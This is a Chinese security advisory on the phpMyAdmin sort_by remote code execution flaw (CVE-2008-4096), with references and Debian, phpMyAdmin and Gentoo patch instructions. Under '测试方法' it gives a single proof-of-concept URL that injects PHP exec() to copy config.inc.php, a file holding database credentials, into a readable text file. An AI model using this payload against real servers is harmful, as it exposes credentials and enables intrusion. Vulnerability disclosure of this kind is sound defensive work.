首页 -> 安全研究

安全研究

安全漏洞
phpMyAdmin sort_by参数远程代码执行漏洞

发布日期:2008-09-15
更新日期:2008-09-17

受影响系统:
phpMyAdmin phpMyAdmin < 2.11.9.1
不受影响系统:
phpMyAdmin phpMyAdmin 2.11.9.1
描述:
BUGTRAQ  ID: 31188
CVE(CAN) ID: CVE-2008-4096,CVE-2008-3197

phpMyAdmin是用PHP编写的工具,用于通过WEB管理MySQL。

phpMyAdmin的server_databases.php脚本没有正确地过滤对sort_by参数的输入,远程攻击者可以通过提交恶意请求注入并执行任意PHP代码。

<*来源:Norman Hippert
  
  链接:http://secunia.com/advisories/31884
        http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2008-7
        http://fd.the-wildcat.de/pma_e36a091q11.php
        http://www.debian.org/security/2008/dsa-1641
        http://security.gentoo.org/glsa/glsa-200903-32.xml
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

建议:
厂商补丁:

Debian
------
Debian已经为此发布了一个安全公告(DSA-1641-1)以及相应补丁:
DSA-1641-1:New phpmyadmin packages fix several issues
链接:http://www.debian.org/security/2008/dsa-1641

补丁下载:
Source archives:

http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-8.dsc
Size/MD5 checksum:     1011 37114453aaf82b81dce82755e64ec033
http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-8.diff.gz
Size/MD5 checksum:    54521 a5b37a0f2d161337cc2acd5653c42312
http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1.orig.tar.gz
Size/MD5 checksum:  3500563 f598509b308bf96aee836eb2338f523c

Architecture independent packages:

http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.9.1.1-8_all.deb
Size/MD5 checksum:  3607794 01749fe13d966bba1c6394ff2c185204

补丁安装方法:

1. 手工安装补丁包:

  首先,使用下面的命令来下载补丁软件:
  # wget url  (url是补丁下载链接地址)

  然后,使用下面的命令来安装补丁:  
  # dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包:

   首先,使用下面的命令更新内部数据库:
   # apt-get update
  
   然后,使用下面的命令安装更新软件包:
   # apt-get upgrade

phpMyAdmin
----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://cache.gmane.org//gmane/comp/security/oss/general/947-001.bin

Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200903-32)以及相应补丁:
GLSA-200903-32:phpMyAdmin: Multiple vulnerabilities
链接:http://security.gentoo.org/glsa/glsa-200903-32.xml

所有phpMyAdmin用户都应升级到最新版本:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=3Ddev-db/phpmyadmin-2.11.9.4"

浏览次数:5262
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障